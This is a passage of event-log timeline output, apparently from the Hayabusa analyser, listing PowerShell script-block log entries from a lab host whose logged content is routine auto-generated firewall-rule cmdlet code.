[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter)",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter)",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service 
SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else 
{ $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParame,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 